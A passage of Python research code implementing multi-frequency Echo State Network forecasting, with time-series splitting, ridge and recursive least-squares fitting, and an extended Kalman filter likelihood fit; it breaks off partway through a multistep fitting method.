periods : numeric, given freq, should create many years. \n    scale: scale of years to group by (century = 100).\n    \"\"\"\n    \n    while True:\n        try:\n            s = pd.Series(data=pd.date_range('1970-01-01', freq=freq, periods=periods))\n            break\n        # If periods is too large\n        except (pd.errors.OutOfBoundsDatetime, OverflowError, ValueError): \n            periods = periods/10\n    \n    return s.groupby(s.dt.year // scale * scale).size().value_counts().index[0]\n\ndef compare_pandas_freq(f1, f2):\n    p1 = infer_periods(f1)\n    p2 = infer_periods(f2)\n    return (f1 if p1 > p2 else f2)\n\ndef _scalpel_loss(t, c=1.0):\n    return abs(t) if abs(t) <= abs(c) else t**2 / abs(c)\nscalpel_loss = np.vectorize(_scalpel_loss, excluded=['c'])\n\ndef _hammer_loss(t, c=1.0):\n    return 0 if abs(t) <= abs(c) else (abs(t) - abs(c))**2\nhammer_loss = np.vectorize(_hammer_loss, excluded=['c'])\n\n#class ShortTimeSeriesSplit:\n#    def __init__(self, split_size=1, n_splits=None):\n#        assert split_size > 0\n#        self.split_size_ = split_size\n#        self.n_splits_ = n_splits\n#\n#    def split(self, data):\n#        assert isinstance(data, pd.DataFrame) or isinstance(data, pd.Series)\n#\n#        T = len(data)\n#        # NOTE: if 'test_size' was set to None, use the last 10% \n#        # of data as testing splits\n#        n_splits = self.n_splits_ if (self.n_splits_ > 1) else max((T // 10) // self.split_size_, 1)\n#        split_size = self.split_size_\n#        min_train_size = T - n_splits * split_size\n#\n#        train_idxs = []\n#        test_idxs = []\n#        for i in range(n_splits):\n#            t_i = min_train_size + i * split_size\n#            train_idxs.append(tuple(range(0, t_i)))\n#            test_idxs.append(tuple(range(t_i, t_i + split_size)))\n#\n#        return tuple(zip(train_idxs, test_idxs))\n\nclass ShiftTimeSeriesSplit:\n    def __init__(self, min_split_size, test_size=1, max_split_size=None):\n        assert min_split_size > 0\n        if not max_split_size is None:\n            assert max_split_size > 0, \"Maximum split size must be positive\"\n            assert max_split_size >= min_split_size, \"Maximum split size must be greater or equal to minimum split size\"\n\n        self.min_split_size_ = min_split_size\n        self.test_size_ = test_size\n        self.max_split_size_ = max_split_size\n    \n    def split(self, data):\n        #assert isinstance(data, pd.DataFrame) or isinstance(data, pd.Series)\n\n        flag_mss = False\n        if not self.max_split_size_ is None:\n            flag_mss = True\n\n        T = len(data)\n        # Compute number of splits\n        n_splits = T - self.min_split_size_ - self.test_size_ + 1\n\n        train_idxs = []\n        test_idxs = []\n        t_i = self.min_split_size_\n        for i in range(n_splits):\n            start_idx = max(0, t_i - self.max_split_size_) if flag_mss else 0\n            train_idxs.append(list(range(start_idx, t_i)))\n            
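# the test window is the test_size_ observations immediately following the training window\n            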
test_idxs.append(list(range(t_i, t_i + self.test_size_)))\n t_i += 1\n\n return tuple(zip(train_idxs, test_idxs))\n\n# ----------------------------------------------------------------\n# ESN Multi-Frequency Class\n#\n\nclass ESNMultiFrequency:\n def __init__(self, models, ar=False, states_join='align', states_lags=None):\n self.models_ = tuple(models)\n self.ar_ = (ar is True)\n self.states_join_ = states_join\n self.states_lags_ = states_lags\n\n # Checks\n for m in self.models_:\n assert isinstance(m, ESN), 'All models must be ESN models'\n\n assert self.states_join_ in ('align', 'lag_stack'), \"State joining specification must be one of: 'align', 'lag_stack'\"\n\n if not self.states_lags_ is None:\n assert len(self.states_lags_) == len(self.models_), 'State lags specification must be of same length as models'\n for l in self.states_lags_:\n assert type(l) is int and l >= 0, 'State lags must be integers and non-negative'\n\n # Inherited properties\n models_N = []\n for m in self.models_:\n models_N.append(m.N_)\n self.models_N_ = models_N\n self.M_ = sum(models_N)\n if not self.states_lags_ is None:\n self.states_N_ = [int(n * (1 + l)) for n, l in zip(self.models_N_, self.states_lags_)]\n else:\n self.states_N_ = self.models_N_\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # \n def prep_data(self, Y, z):\n Y_dates = Y.index\n Y_ = esn_data_to_nparray(Y)\n if Y_ is None:\n raise TypeError(\"Type of Y not recognized, need pandas.DataFrame or numpy.ndarray\")\n assert isinstance(Y_dates, pd.DatetimeIndex)\n \n z_dates = []\n z_ = [] \n #assert len(z) > 0\n if len(z) > 0:\n for zj in z:\n zj_dates = zj.index\n zj_ = esn_data_to_nparray(zj)\n if zj_ is None:\n raise TypeError(\"Type of z not recognized, need pandas.DataFrame or numpy.ndarray\")\n assert isinstance(zj_dates, pd.DatetimeIndex)\n\n z_dates.append(zj_dates)\n z_.append(zj_)\n # Make immutable\n z_dates = tuple(z_dates)\n z_ = tuple(z_)\n\n return Y_, Y_dates, z_, z_dates\n\n def multifreq_states(self, Y, z, init, washout_len, Y_dates=None, z_dates=None):\n # States\n X = []\n \n # Y states [if autoregressive]\n #X0 = self.models_[0].base_generate_states(\n # z=Y, init=init[0], washout_len=washout_len\n #)\n #X0 = pd.DataFrame(X0, index=Y_dates)\n #X.append(X0)\n\n # z states\n Z = (Y, ) + z if self.ar_ else z\n dates = (Y_dates, ) + z_dates if self.ar_ else z_dates\n for j, zj_ in enumerate(Z):\n Xj = self.models_[j].base_generate_states(\n z=zj_, init=init[j], washout_len=washout_len\n )\n # Add dates to states\n Xj = pd.DataFrame(\n Xj, \n #columns=tuple(map(lambda x : 'C'+str(x), range(Xj.shape[1]))),\n index=dates[j][washout_len:],\n )\n #\n X.append(Xj)\n\n return X\n\n def multifreq_states_to_matrix(self, ref_dates, states, lags=None):\n # Multifrequency state matrix\n X_multi = None\n\n if self.states_join_ == 'align':\n # High-frequency states are aligned, i.e. 
for each frequency\n            # only the closest past / contemporary state to the low-frequency \n            # target is used as regressor.\n            X_multi = np.full((len(ref_dates), self.M_), np.nan)\n\n            p = 0\n            for j, Xj in enumerate(states):\n                #if j == 0:\n                #    X_multi[:,0:self.models_N_[0]] = np.squeeze(Xj)\n                #else:\n                #    for t, lf_date_t in enumerate(ref_dates):\n                #        cpd, _ = closest_past_date(states_dates[j-1], lf_date_t)\n                #        X_multi[t,p:(p+self.models_N_[j])] = np.squeeze(Xj.loc[cpd])\n\n                kt = 0\n                for t, lf_date_t in enumerate(ref_dates):\n                    #cpd, _ = closest_past_date(states_dates[j-1], lf_date_t)\n                    cpd, kt = closest_past_date(Xj.index, lf_date_t, cutoff=kt)\n                    X_multi[t,p:(p+self.models_N_[j])] = np.squeeze(Xj.loc[cpd])\n                #\n                p += self.models_N_[j]\n\n        elif self.states_join_ == 'lag_stack':\n            # High-frequency states are stacked with lags, i.e. for each frequency\n            # the closest past / contemporary state to the low-frequency \n            # target + lagged states are used together as regressors.\n            if lags is None:\n                lags = np.array(self.states_lags_).astype(int)\n            else:\n                assert len(lags) == len(self.models_), \"State stacking: lags specification not of same length as models\"\n                for l in lags:\n                    assert type(l) is int and l >= 0, 'State lags must be integers and non-negative'\n\n            X_multi = np.full((len(ref_dates), int(sum(self.models_N_ * (1 + lags)))), np.nan)\n\n            p = 0\n            for j, Xj in enumerate(states):\n                kt = 0\n                for t, lf_date_t in enumerate(ref_dates):\n                    cpd, kt = closest_past_date(Xj.index, lf_date_t, cutoff=kt)\n                    X_multi[t,p:(p+self.models_N_[j])] = np.squeeze(Xj.loc[cpd])\n                    # Lags\n                    q = p + self.models_N_[j]\n                    for l in range(lags[j]):\n                        cpd_lag = Xj.index[kt-l-1]\n                        X_multi[t,q:(q+self.models_N_[j])] = np.squeeze(Xj.loc[cpd_lag])\n                        q += self.models_N_[j]\n                #\n                p += q # = self.models_N_[j] * int(1 + lags[j])\n\n        else:\n            raise ValueError(\"Multifrequency state joining method not defined\")\n\n        return X_multi\n    \n    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    # ESN Multi-Frequency Fitting\n\n    def fit(self, Y, z, steps=1, method='ridge', Lambda=0, full=True, Lambda_comps=None, options='',\n            init=None, washout_len=0, debug=True):\n        # Flatten data and extract datetime indexes\n        Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n        # Check model number vs data\n        assert len(self.models_) == int(self.ar_) + len(z), \"Number of ESN models does not correspond to number of data series\"\n\n        # Decompose options strings\n        method_name = re.findall(\"^\\w+(?=-)?\", method)\n        method_opts = re.findall(\"(?<=-)\\w+(?=:)?\", method)\n        method_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", method)\n\n        method = method_name[0]\n\n        if debug:\n            print(\". Method:\")\n            print(method_name)\n            print(method_opts)\n            print(method_nums)\n\n        opts_opts = re.findall(\"(?<=-)\\w+(?=:)?\", options)\n        opts_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", options)\n\n        if debug:\n            print(\". 
Options:\")\n print(opts_opts)\n print(opts_nums)\n \n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # States matrix\n X_multi = self.multifreq_states_to_matrix(\n ref_dates=Y_dates, states=X,\n )\n\n # OPTIONAL: reduce state dimensionalty using PCA\n pca = None\n if 'pca' in method_opts:\n pca_factor = float(method_nums[method_opts.index('pca')])\n assert pca_factor > 0\n if pca_factor > 1:\n pca_factor = int(pca_factor)\n\n # PCA\n pca = PCA(n_components=pca_factor)\n X_multi = pca.fit_transform(X_multi)\n # NOTE: below is the \"wrong\" time-dimension \"PCA\"\n #X_multi = pca.fit(X_multi.T).components_.T\n\n if debug: print(f\". PCA: states space size reduced to N = {pca.n_components_}\")\n\n if not method in (None, 'none', 'least_squares', 'r_ls'):\n Lambda_ = np.atleast_1d(np.array(Lambda))\n if pca is None:\n assert len(Lambda_) == len(self.models_), \"Lambda is not scalar, must have same length as number of models\"\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = Lambda[n] * np.ones(k)\n i += k\n Lambda_ = np.diagflat(d)\n else:\n if not len(Lambda_) == 1:\n print(\"PCA requires scalar ridge penalty, selecting only first component of 'Lambda'\")\n Lambda_ = Lambda_[0]\n\n # Fit\n assert steps > 0\n\n W = []\n for s in range(steps):\n # Slice matrices\n Ys = Y_[(1+s):,]\n Xs = X_multi[0:(-1-s),]\n\n Ws = None\n if (method == 'none') or (method is None):\n Ws = np.ones((X.shape[1], 1)) \n elif method == 'least_squares':\n Ws = ls_ridge(Y=Ys, X=Xs, Lambda=0)\n elif method == 'ridge':\n Ws = ls_ridge(Y=Ys, X=Xs, Lambda=Lambda_)\n elif method == 'ridge_jackknife':\n Ws = jack_ridge(Y=Ys, X=Xs, Lambda=Lambda_)\n elif method == 'rls':\n min_train_size = 1\n if 'min_train_size' in opts_opts:\n min_train_size = int(opts_nums[opts_opts.index('min_train_size')])\n assert min_train_size >= 0\n V0 = np.hstack((np.ones((min_train_size, 1)), Xs[0:min_train_size,]))\n P0 = np.linalg.pinv(V0.T @ V0)\n W0 = ls_ridge(Y=Ys[0:min_train_size,], X=Xs[0:min_train_size,], Lambda=0)\n Ws, _ = r_ls(Y=Ys[min_train_size:,], X=Xs[min_train_size:,], W0=W0, P0=P0)\n Ws = [W0,] + Ws\n else:\n raise ValueError(\"Fitting method not defined\")\n\n W.append(Ws)\n\n # OPTIONAL: Fit full individual autoregressive models \n # (Necessary for multi-step forecasting)\n W_comps_ar = []\n if full:\n if Lambda_comps is None:\n Lambda_comps = Lambda\n\n for j, Xj in enumerate(X):\n if self.ar_:\n Ys_j = Y_[1:,] if j == 0 else z_[j-1][1:,]\n else:\n Ys_j = z_[j][1:,]\n Xs_j = Xj.iloc[0:-1,].to_numpy()\n # Fit individual weights\n if (method == 'none') or (method is None):\n W_comps_ar.append(np.ones((Xs_j.shape[1], 1)))\n elif method == 'least_squares':\n W_comps_ar.append(ls_ridge(Y=Ys_j, X=Xs_j, Lambda=0))\n elif method == 'ridge':\n W_comps_ar.append(ls_ridge(Y=Ys_j, X=Xs_j, Lambda=Lambda_comps[j]))\n else:\n raise ValueError(\"Fitting method not defined\")\n #\n #if method == 'ridge':\n # eps = 1.3\n # fac = 1\n # max_eig = np.Inf\n # l = 0\n # while max_eig > 1.2 and l <= 1e5:\n # fac *= eps\n # W_j = ls_ridge(Y=Ys_j, X=Xs_j, Lambda=(Lambda[j] * fac))\n # max_eig = np.max(np.abs(np.linalg.eig(\n # self.models_[j].A_ + self.models_[j].C_ @ W_j[1:,].T\n # )[0]))\n # l += 1\n # 
W_comps_ar.append(W_j)\n\n\n # Fit objects\n esnmulti_fit_for = []\n for s in range(steps):\n # Slice matrices\n X_s = X_multi[0:(-1-s),]\n V_fit_s = np.hstack((np.ones((X_s.shape[0], 1)), X_s))\n\n # Compute fits\n if method in ('least_squares', 'ridge', 'ridge_jackknife'):\n Y_fit_s = pd.DataFrame(data=V_fit_s @ W[s], index=Y_dates[(1+s):])\n elif method == 'rls':\n Y_fit_r_ls_s = np.zeros(Y_[(1+s):,].shape)\n for t in range(len(Y_fit_r_ls_s)):\n if t < min_train_size:\n Y_fit_r_ls_s[t,] = V_fit_s[t,] @ Ws[0]\n else:\n Y_fit_r_ls_s[t,] = V_fit_s[t,] @ Ws[t-min_train_size]\n Y_fit_s = pd.DataFrame(data=Y_fit_r_ls_s, index=Y_dates[(1+s):])\n \n Y_s = pd.DataFrame(data=Y_[(1+s):,], index=Y_dates[(1+s):])\n Residuals_s = Y_s - Y_fit_s\n RSS_s = np.sum(Residuals_s.to_numpy() ** 2)\n\n esnmulti_fit_for.append({\n 's': s+1,\n 'W': W[s],\n 'Y_fit': Y_fit_s,\n 'Residuals': Residuals_s,\n 'RSS': RSS_s,\n 'Y': Y_s,\n 'V': V_fit_s,\n 'X': X_s,\n })\n\n # Output\n fit_out = {\n 'model': 'ESNMultiFrequency',\n 'fit_for': esnmulti_fit_for,\n 'fit_comp_ar': W_comps_ar,\n 'steps': steps,\n 'dates': Y_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': method,\n 'Lambda': Lambda,\n 'init': init,\n 'state_tuple': X,\n 'pca': pca,\n #'end_state': X_multi[-1,],\n 'washout_len': washout_len,\n }\n\n return fit_out\n\n def fitKF(self, Y, z, steps=1, method='EKF_ridge', Lambda=0, \n init=None, washout_len=0, full=True, options='', debug=True):\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # NOTE: for now this code should ONLY be used for 1-step-ahead forecast with no lags\n #assert len(self.models_) == 1\n assert steps == 1\n assert self.states_lags_ is None\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(z), \"Number of ESN models does not correspond to number of data series\"\n\n # Decompose options strings\n method_name = re.findall(\"^\\w+(?=-)?\", method)\n method_opts = re.findall(\"(?<=-)\\w+(?=:)?\", method)\n method_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", method)\n\n kf_method = method_name[0]\n\n if debug:\n print(\". Method:\")\n print(method_name)\n print(method_opts)\n print(method_nums)\n \n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n\n # NOTE: we compute 'preliminary' states to create alignment\n # indexes that can be re-used in the optimization loop\n # (direct date comparison are too expensive)\n if debug: print(\". 
Building states date indexes\")\n\n pre_X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # States matrix\n pre_X_multi = self.multifreq_states_to_matrix(\n ref_dates=Y_dates, states=pre_X,\n )\n\n # States indexes\n X_multi_idx = []\n for j, Xj in enumerate(pre_X):\n if not self.states_lags_ is None:\n idx_j = np.full((1+self.states_lags_[j], len(Y_dates)), np.nan)\n else:\n idx_j = np.full((1, len(Y_dates)), np.nan)\n kt = 0\n for t, lf_date_t in enumerate(Y_dates):\n _, kt = closest_past_date(Xj.index, lf_date_t, cutoff=kt)\n idx_j[0,t] = kt \n if not self.states_lags_ is None:\n for l in range(self.states_lags_[j]):\n idx_j[1+l,t] = kt-1\n X_multi_idx.append(idx_j.astype(int))\n\n # Weight estimation method\n if kf_method == 'EKF_ridge':\n Lambda_ = None\n if not np.isscalar(Lambda):\n assert len(Lambda) == len(self.models_), \"Lambda is not scalar, must have same length as number of models\"\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = Lambda[n] * np.ones(k)\n i += k\n Lambda_ = np.diagflat(d)\n else:\n Lambda_ = Lambda\n Wfun = lambda Y, X : ls_ridge(Y=Y, X=X, Lambda=Lambda_)\n else:\n raise ValueError(\"Fitting method not defined\")\n\n # Pre-weights\n Ys1 = Y_[1:,]\n Xs1 = pre_X_multi[0:-1,]\n pre_W = np.atleast_2d(Wfun(Y=Ys1, X=Xs1))\n\n # MF-EKF log-likelihood\n Z = (Y_, ) + z_ if self.ar_ else z_\n\n Ny = Y_.shape[1]\n Nz = [zj_.shape[1] for zj_ in Z]\n T = len(Y_dates)\n\n # Init\n m0 = [model.zeta_ for model in self.models_]\n P0 = [1e-2 * np.eye(Nj) for Nj in self.models_N_]\n\n W_a = pre_W[0,:]\n W_w = pre_W[1:,:]\n\n def MF_EKF_diag_logLike(parsEKF):\n j = 0\n p_Sigma_eps = []\n for i, Nz_j in enumerate(Nz):\n #p_Sigma_eps_j = parsEKF[j:(j + Nz_j)]\n p_Sigma_eps_j = np.hstack((np.ones(1), parsEKF[j:(j + Nz_j - 1)]))\n p_Sigma_eps.append(p_Sigma_eps_j)\n j += Nz_j - 1\n p_Sigma_eta = parsEKF[j:(j + Ny)]\n\n #p_Sigma_eps = []\n #for j, Nz_j in enumerate(Nz):\n # p_Sigma_eps_j = parsEKF[j] * np.ones(Nz_j)\n # p_Sigma_eps.append(p_Sigma_eps_j)\n #p_Sigma_eta = parsEKF[-1] * np.ones(Ny)\n\n # ESN model parameter aliases\n rho_ = [model.rho_ for model in self.models_]\n A_ = [model.A_ for model in self.models_]\n gamma_ = [model.gamma_ for model in self.models_]\n C_ = [model.C_ for model in self.models_]\n zeta_ = [model.zeta_ for model in self.models_]\n leak_rate_ = [model.leak_rate_ for model in self.models_]\n\n # Multi-Frequency Extended Kalman Filter\n X_prd = np.zeros((self.M_, T-1))\n X_flt = np.zeros((self.M_, T-1))\n L_l_t = np.zeros(T)\n LogLike = 0\n\n # Prediction variables\n M0_t = []\n P0_t = P0.copy()\n\n # Update variables\n P_t = P0.copy()\n M_t = m0.copy()\n\n # NOTE: for now, implement only the 'canonical' linearization\n sl = [0 for _ in range(len(Z))]\n # For each low-frequency period (t-index) from 0 to T-1\n for t in range(T-1):\n m0_t = np.full((self.M_, 1), np.nan)\n # For each reservoir component...\n p = 0\n for j, zj_ in enumerate(Z):\n # Prediction: iterate state equations forwards at own freqency (s index)\n m0_s = M_t[j]\n for s in range(sl[j], X_multi_idx[j][0][t]+1):\n u0_s = (rho_[j] * A_[j]) @ m0_s + (gamma_[j] * C_[j]) @ zj_[[s],:].T + zeta_[j]\n m0_s = leak_rate_[j] * m0_s + (1 - leak_rate_[j]) * np.tanh(u0_s)\n D_u0_t = 1 - (np.tanh(u0_s) ** 2)\n F_x = leak_rate_[j] * np.eye(self.models_N_[j]) + (1 - leak_rate_[j]) * D_u0_t * rho_[j] * A_[j]\n F_q = (1 - leak_rate_[j]) * D_u0_t * gamma_[j] * C_[j]\n P0_s = F_x @ P_t[j] @ F_x.T 
+ F_q @ np.diagflat(p_Sigma_eps[j]) @ F_q.T\n P0_s = (P0_s + P0_s.T) / 2\n m0_t[p:(p+self.models_N_[j]),] = m0_s\n P0_t[j] = P0_s\n p += self.models_N_[j]\n # Move s index forward\n sl[j] = X_multi_idx[j][0][t]\n # Update: use only last prediction step (s=0 for all j)\n v_t = Ys1[[t],:].T - (W_w.T @ m0_t + W_a[:,None])\n S_t = W_w.T @ block_diag(*P0_t) @ W_w + np.diagflat(p_Sigma_eta)\n K_t = block_diag(*P0_t) @ W_w @ np.linalg.inv(S_t)\n m_u_t = m0_t + K_t @ v_t\n P_u_t = block_diag(*P0_t) - K_t @ S_t @ K_t.T\n P_u_t = (P_u_t + P_u_t.T) / 2\n #if np.linalg.norm(P_u_t, ord=np.inf) <= 1e-11:\n # P_u_t = 1e-12 * np.eye(self.M_)\n # Slice updates to individual reservoirs\n p = 0\n for j in range(len(Z)):\n M_t[j] = m_u_t[p:(p+self.models_N_[j]),]\n P_t[j] = P_u_t[p:(p+self.models_N_[j]),p:(p+self.models_N_[j])]\n p += self.models_N_[j]\n # Save states\n X_prd[:,t] = np.squeeze(m0_t)\n X_flt[:,t] = np.squeeze(m_u_t)\n\n #print(np.linalg.svd((S_t))[1])\n\n # Compute log-likelihood\n L_l_t[t] = multivariate_normal.pdf(\n np.squeeze(Ys1[[t],:]), \n mean=np.squeeze(W_w.T @ m0_t + W_a[:,None]), cov=S_t\n )\n #\n LogLike = np.sum(np.log(L_l_t[washout_len:] + 1e-12))\n\n return (-LogLike, X_prd, X_flt, M_t, P_t)\n\n # Starting values\n #x0 = np.hstack([1e-2 * vech(np.eye(Nj)) for Nj in self.models_N_] + [1e-2 * vech(np.eye(Ny)),])\n #xl = np.hstack([-1e1 * np.ones(Nj*(Nj+1)//2) for Nj in self.models_N_] + [-1e1 * np.ones(Ny*(Ny+1)//2),])\n #xu = np.hstack([+1e1 * np.ones(Nj*(Nj+1)//2) for Nj in self.models_N_] + [+1e1 * np.ones(Ny*(Ny+1)//2),])\n\n x0 = 1e-2 * np.ones(sum(Nz)-1 + Ny)\n xl = 1e-12 * np.ones(sum(Nz)-1 + Ny)\n xu = 1e2 * np.ones(sum(Nz)-1 + Ny)\n\n #x0 = 1e-2 * np.ones(len(Nz) + 1)\n #xl = 1e-18 * np.ones(len(Nz) + 1)\n #xu = 1e2 * np.ones(len(Nz) + 1)\n\n print(MF_EKF_diag_logLike(x0)[0])\n \n # Optimize for [Sigma_eps], Sigma_eta (given W)\n opt_res = pymoo_minimize(\n FunctionalProblem(\n len(x0),\n lambda x : MF_EKF_diag_logLike(x)[0],\n x0=x0, xl=xl, xu=xu,\n ), \n PatternSearch(), \n get_termination(\"n_eval\", 1000), \n #get_termination(\"time\", \"00:15:00\"),\n #get_termination(\"time\", \"00:00:05\"),\n verbose=True, \n seed=1203477\n ) \n res_X = opt_res.X\n\n #opt_res = scipy_minimize(\n # fun=lambda x : MF_EKF_diag_logLike(x)[0],\n # x0=x0,\n # bounds=tuple(zip(xl, xu)),\n # method='L-BFGS-B',\n # #method='trust-constr',\n # options={'disp': True, 'maxiter': 1, 'iprint': 1},\n #)\n #res_X = opt_res.x\n\n if debug: print(\". 
Packing result\")\n\n #j = 0\n #Sigma_eps_opt = []\n #for Nz_j in Nz:\n # L_Sigma_eps_j = matrh(res_X[j:(j + Nz_j*(Nz_j+1)//2)], Nz_j)\n # Sigma_eps_j = L_Sigma_eps_j @ L_Sigma_eps_j.T\n # Sigma_eps_opt.append(Sigma_eps_j)\n # j += Nz_j*(Nz_j+1)//2\n #L_Sigma_eta = matrh(res_X[j:(j + Ny*(Ny+1)//2)], Ny)\n #Sigma_eta_opt = L_Sigma_eta @ L_Sigma_eta.T\n\n j = 0\n Sigma_eps_opt = []\n for Nz_j in Nz:\n Sigma_eps_opt.append(res_X[j:(j + Nz_j)])\n j += Nz_j\n Sigma_eta_opt = res_X[j:(j + Ny)]\n\n # Fit objects\n (logLike, X_prd, X_flt, M_t, P_t) = MF_EKF_diag_logLike(xu)\n\n #print(logLike)\n\n Y_1 = pd.DataFrame(data=Ys1, index=Y_dates[(1):])\n Y_fitKF_1 = pd.DataFrame(\n data=np.reshape(W_w.T @ X_prd + W_a[:,None], Ys1.shape),\n index=Y_dates[(1):],\n )\n Residuals_KF_1 = Y_1 - Y_fitKF_1\n RSS_KF_1 = np.sum(Residuals_KF_1 ** 2)\n\n esnmulti_fitKF_for = [{\n 's': 1,\n 'W': pre_W,\n 'Y_fit': Y_fitKF_1,\n 'Residuals': Residuals_KF_1,\n 'RSS': RSS_KF_1,\n 'Y': Y_1,\n #'V': V_fit_s,\n #'X': X,\n 'X_predict': X_prd,\n 'X_filter': X_flt,\n 'M_t': M_t,\n 'P_t': P_t,\n 'Sigma_eps': Sigma_eps_opt,\n 'Sigma_eta': Sigma_eta_opt,\n },]\n\n # Output\n fitKF_out = {\n 'model': 'ESNMultiFrequency',\n 'fitKF_for': esnmulti_fitKF_for,\n #'fit_comp_ar': W_comps_ar,\n 'steps': 1,\n 'dates': Y_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': method,\n 'Lambda': Lambda,\n 'init': init,\n #'state_tuple': X,\n #'pca': pca,\n #'end_state': X_multi[-1,],\n 'washout_len': washout_len,\n }\n\n return fitKF_out\n\n def fit_components_ar(self, z, method='ridge', Lambda=0, init=None, washout_len=0):\n \"\"\"\n Fit a full (i.e. all series) autoregressive model for each indvidual model/dataset\n \"\"\"\n\n # Flatter data and extract datetime indexes\n z_dates = []\n z_ = [] \n #assert len(z) > 0\n if len(z) > 0:\n for zj in z:\n zj_dates = zj.index\n zj_ = esn_data_to_nparray(zj)\n if zj_ is None:\n raise TypeError(\"Type of z not recognized, need pandas.DataFrame or numpy.ndarray\")\n assert isinstance(zj_dates, pd.DatetimeIndex)\n\n z_dates.append(zj_dates)\n z_.append(zj_)\n # Make immutable\n z_dates = tuple(z_dates)\n z_ = tuple(z_)\n\n # Check model number vs data\n assert len(self.models_) == len(z), \"Number of ESN models does not correspond to number of data series\"\n \n # States\n init = [None for _ in range(len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n\n assert len(Lambda) == len(self.models_), \"Lambda is not scalar, must have same length as number of models\"\n\n # Fit\n esnmulti_fit_comp_ar = []\n for j, zj_ in enumerate(z_):\n # States\n Xj = self.models_[j].base_generate_states(\n z=zj_, init=init[j], washout_len=washout_len\n )\n # Regression\n Ys = zj_[1:,]\n Xs = Xj[0:-1,]\n\n Ws = None\n if (method == 'none') or (method is None):\n Ws = np.ones((Xj.shape[1], 1)) \n elif method == 'ridge':\n Ws = ls_ridge(Y=Ys, X=Xs, Lambda=Lambda[j])\n else:\n raise ValueError(\"Fitting method not defined\")\n\n # Fit objects\n V_fit_s = np.hstack((np.ones((Xs.shape[0], 1)), Xs))\n\n Ys = pd.DataFrame(data=Ys, index=z_dates[j][1:])\n Y_fit_s = pd.DataFrame(data=V_fit_s @ Ws, index=z_dates[j][1:])\n Residuals_s = Ys - Y_fit_s\n RSS_s = np.sum(Residuals_s.to_numpy() ** 2)\n\n esnmulti_fit_comp_ar.append({\n 'j': j,\n 'W': Ws,\n 'Y_fit': Y_fit_s,\n 'Residuals': Residuals_s,\n 'RSS': RSS_s,\n 'Y': Ys,\n 'V': V_fit_s,\n 'X': Xs,\n })\n\n # Output\n fit_out = {\n 'model': 
'ESNMultiFrequency_FullComponentsAR',\n 'fit_comp_ar': esnmulti_fit_comp_ar,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': method,\n 'Lambda': Lambda,\n 'init': init,\n 'washout_len': washout_len,\n }\n\n return fit_out\n\n\n def fit_multistep(self, Y, z, steps=1, method='ridge', Lambda=0, \n init=None, washout_len=0, debug=True):\n \"\"\"\n Fit an ESN multi-frequency model for autonomous multiple-step forecasting. \n States are first collected, and a \"full\" target regression is fitted to\n allow for autonomous state iteration. Then for each step (i.e. horizon)\n a specific target weigth matrix is estimated.\n \"\"\"\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(z), \"Number of ESN models does not correspond to number of data series\"\n\n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # States matrix\n #X_multi = self.multifreq_states_to_matrix(\n # ref_dates=Y_dates, states=X,\n #)\n\n # Ridge penalty for each step\n Lambda_s = []\n if not Lambda is None:\n if len(tuple(Lambda)) == 1:\n Lambda = [np.atleast_1d(np.array(Lambda)) for _ in range(steps)]\n else:\n assert len(Lambda) == steps, f\"Lambda must have same length as steps, {steps}, found {len(Lambda)}\"\n for j in range(len(Lambda)):\n assert len(Lambda[j]) == len(self.models_), f\"Penalty array Lambda[{j}] should have length {len(self.models_)}, found {len(Lambda[j])}\"\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = (Lambda[j])[n] * np.ones(k)\n i += k\n Lambda_s.append(np.diagflat(d))\n #print(d)\n\n # (1) Fit \"full\" individual reservoir models\n W_comps_full = []\n for j, Xj in enumerate(X):\n if self.ar_:\n Z1s_j = Y_[1:,] if j == 0 else z_[j-1][1:,]\n else:\n Z1s_j = z_[j][1:,]\n X0s_j = Xj.iloc[0:-1,].to_numpy()\n # \n if (method == 'none') or (method is None):\n W_comps_full.append(np.zeros((X0s_j.shape[1], 1)))\n elif method == 'least_squares':\n W_comps_full.append(ls_ridge(Y=Z1s_j, X=X0s_j, Lambda=0))\n elif method == 'ridge':\n W_comps_full.append(ls_ridge(Y=Z1s_j, X=X0s_j, Lambda=Lambda_s[0][j]))\n else:\n raise ValueError(\"Fitting method not defined\")\n\n # Fit\n assert steps > 0, \"Forecasting steps must be > 0\"\n\n # State reference dates\n ref_dates = Y_dates\n ref_dates_0 = Y_dates\n\n 